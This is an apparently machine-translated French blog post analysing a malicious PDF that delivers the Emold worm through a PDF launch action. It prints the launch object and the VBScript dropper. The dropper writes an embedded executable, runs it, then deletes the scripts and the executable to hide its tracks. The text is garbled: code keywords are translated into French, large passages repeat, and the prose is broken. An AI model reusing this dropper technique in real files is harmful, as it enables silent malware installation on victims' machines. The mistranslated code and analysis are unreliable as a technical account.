09:30
anonymous
Informations techniques (analyse)
Worm:Win32/Emold.gen!D est une détection générique pour un ver qui installe un rootkit trojan, malware téléchargements et se propage vers les disques amovibles.Attachés à ce mail il y a le PDF malveillant appelé "doc.pdf". Ce PDF utilise les dernières vulnérabilités adobe "Lancement PDF"Récemment rendu public, faire l '«écho» dans le fichier bat. qui
contient les instructions pour télécharger et exécuter un cheval de Troie: Emold.
Il s'agit d'un "downloader" génériques, qui est utilisée comme un moyen d'installer un malware en deuxième possibilité.
"Software Microsoft Windows NT CurrentVersion Image File Execution Options explorer.exe"
et le fichier:” C:/Program Files / Microsoft Common / svchost.exe “
Nous analysons le fichier PDF, ce qui montre "son action malveillante".
Mettre cmd.exe dans un fichier, appelé "script.vbs", et puis exécutez les deux fichiers "script.vbs" et "batscript.vbs". Ensuite:8 0 obj <<
/S / Lancement /Win <<
/P (/c echo Set fso = CreateObject("Scripting.FileSystemObject") script.vbs> && echo Set f = fso.OpenTextFile(“doc.pdf”, 1, True) >> Script.vbs && echo pf =
f.ReadAll >> Script.vbs && echo s = InStr(jj,”‘SS”) >> Script.vbs && echo e = InStr(jj,”‘EE”) >> Script.vbs && echo s =
Mid(jj,avec,es) >> Script.vbs && echo Set z = fso.OpenTextFile(“batscript.vbs”, 2, True) >> Script.vbs && echo s = Remplacer(avec,”%”,”")
>> Script.vbs && echo z.Write(avec) >> Script.vbs && script.vbs && batscript.vbs
/S / Lancement /Win <<
/P (/c echo Set fso = CreateObject("Scripting.FileSystemObject") script.vbs> && echo Set f = fso.OpenTextFile(“doc.pdf”, 1, True) >> Script.vbs && echo pf =
f.ReadAll >> Script.vbs && echo s = InStr(jj,”‘SS”) >> Script.vbs && echo e = InStr(jj,”‘EE”) >> Script.vbs && echo s =
Mid(jj,avec,es) >> Script.vbs && echo Set z = fso.OpenTextFile(“batscript.vbs”, 2, True) >> Script.vbs && echo s = Remplacer(avec,”%”,”")
>> Script.vbs && echo z.Write(avec) >> Script.vbs && script.vbs && batscript.vbs
Set fso = CreateObject(“Scripting.FileSystemObject”) Set f = fso.OpenTextFile(“doc.pdf”, 1, True) echo pf = f.ReadAll echo s =
InStr(jj,”‘SS”) echo e = InStr(jj,”‘EE”) s = Mid(jj,avec,es) Set z = fso.OpenTextFile(“batscript.vbs”, 2, True) s =
Remplacer(avec,”%”,”") z.Write(avec)
Lorsque le fichier "script.vbs" est lancé, il ouvre le fichier "doc.pdf" et recherche les balises "SS" et "EE" pour marquer le début et la fin de cette section de performance utiles du fichier pdf,InStr(jj,”‘SS”) echo e = InStr(jj,”‘EE”) s = Mid(jj,avec,es) Set z = fso.OpenTextFile(“batscript.vbs”, 2, True) s =
Remplacer(avec,”%”,”") z.Write(avec)
appelé "batscript.vbs". Cette section du PDF se présente comme suit:
5 0 obj << /Length 46 >> flux BT /F1 34 Tf 50 500 Td (Renseignements
importants sur les doc.pdf)
importants sur les doc.pdf)
%»SS %Dim b %Fonction c(d) %c = chr(d) %End Function %b = Array(c(077),c(090),c(144),c(000),c(003),c(000),c(000),c(000),
c(004),c(000),c(000)… …cette ligne est 248413 caractères… …c(000),c(000),c(000),c(000 ),”") %Set fso = CreateObject(“Scripting.FileSystemObject”) %Set f =
fso.OpenTextFile(“game.exe”, 2, True) %Pour i = 0 Pour 35328 %f.write(b(dans)) %Suivant %f.close() %Set WshShell = WScript.CreateObject(“WScript.Shell”) %WshShell.Run
“game.exe c cmd.exe /” %WScript.Sleep 3000 %Set f = FSO.GetFile(“game.exe”) %f.Delete %Set f = FSO.GetFile(“batscript.vbs”) %f.Delete %Set f =
FSO.GetFile(“script.vbs”) %f.Delete %'EE endstream Il est clair que dans ce PDF il y a un virus, va ce dire la personne un temps soit peux éclairer...L'exécutable nommé
"game.exe". Il va ce mettre a recherché le logiciels malveillants! Mais...... Après son exécution, puis l'installation du logiciels malveillants, le script nettoie le système en supprimant le fichier
"script.vbs", "Batscript.vbs" et "game.exe".
c(004),c(000),c(000)… …cette ligne est 248413 caractères… …c(000),c(000),c(000),c(000 ),”") %Set fso = CreateObject(“Scripting.FileSystemObject”) %Set f =
fso.OpenTextFile(“game.exe”, 2, True) %Pour i = 0 Pour 35328 %f.write(b(dans)) %Suivant %f.close() %Set WshShell = WScript.CreateObject(“WScript.Shell”) %WshShell.Run
“game.exe c cmd.exe /” %WScript.Sleep 3000 %Set f = FSO.GetFile(“game.exe”) %f.Delete %Set f = FSO.GetFile(“batscript.vbs”) %f.Delete %Set f =
FSO.GetFile(“script.vbs”) %f.Delete %'EE endstream Il est clair que dans ce PDF il y a un virus, va ce dire la personne un temps soit peux éclairer...L'exécutable nommé
"game.exe". Il va ce mettre a recherché le logiciels malveillants! Mais...... Après son exécution, puis l'installation du logiciels malveillants, le script nettoie le système en supprimant le fichier
"script.vbs", "Batscript.vbs" et "game.exe".
Posted in: Hacking
0 التعليقات:
Enregistrer un commentaire